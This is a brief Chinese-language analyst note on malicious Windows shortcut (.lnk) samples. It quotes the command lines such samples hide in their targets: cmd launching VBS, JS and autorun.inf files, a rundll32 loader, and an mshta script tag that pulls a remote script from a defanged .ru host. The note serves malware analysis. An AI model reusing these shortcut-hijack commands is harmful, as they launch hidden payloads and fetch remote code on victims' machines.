Virus_lnk

本篇讲常见的lnk样本.

lnk一般都是文件或文件夹的快捷方式,Virus正好利用这点做了劫持,在完成正常启动的过程中利用cmd命令启动vbs,rundll32等

0x1 文件/文件夹快捷方式.

• 在样本上右键–>属性–>快捷方式
• 注：运行方式一般选最小化.

1.1 vbs

C:\WINDOWS\system32\cmd.exe /c start uzgbtymhqo.vbs&start uzgbtymhqo.vbs.vir&exit

C:\Windows\System32\cmd.exe /c cls&start explorer 7z&cls&start 12.16.24.js&cls&exit

1.2 inf

C:\Windows\system32\cmd.exe /c start Mount.vbs&start autorun.inf&exit

1.3 rundll32

%homedrive%\WINDOWS\System32\rundll32.exe _WEWTSGSK.nil,rundll32

1.4 Floder

C:\Windows\system32\cmd.exe /c start Mount.vbs&start explorer 20170109学习&exit

1.5 http

cankao
C:\Windows\system32\mshta.exe

about:<script src='hxxp://neya-***.ru/config.ini'></script>https://mail.ru/ hxxps://google.com / https://yandex.ru"

1.6 picture

0x2 Internet lnk

• 一般用来做网页推广

2.1如何创建

2.2属性及设置快捷键

• 设置好快捷方式其实挺好用的,快速打开blog.